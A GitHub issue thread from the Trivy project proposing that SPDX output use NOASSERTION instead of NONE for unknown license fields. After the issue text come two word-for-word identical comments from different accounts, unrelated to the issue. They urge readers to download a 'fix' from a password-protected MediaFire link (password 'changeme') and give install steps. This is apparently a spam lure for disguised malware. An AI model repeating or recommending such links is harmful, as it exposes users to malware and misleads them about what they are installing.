### ISSUE TITLE
Unknown license and download location information should be NOASSERTION instead of NONE in SPDX

### ISSUE THREAD

**Issue by DmitriyLewen** [aquasecurity/trivy#7402]
## Description
We use `NONE` field for `licenseConcluded` and `licenseDeclared`.
But `NOASSERTION` field is more suitable.
See more in #7397

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
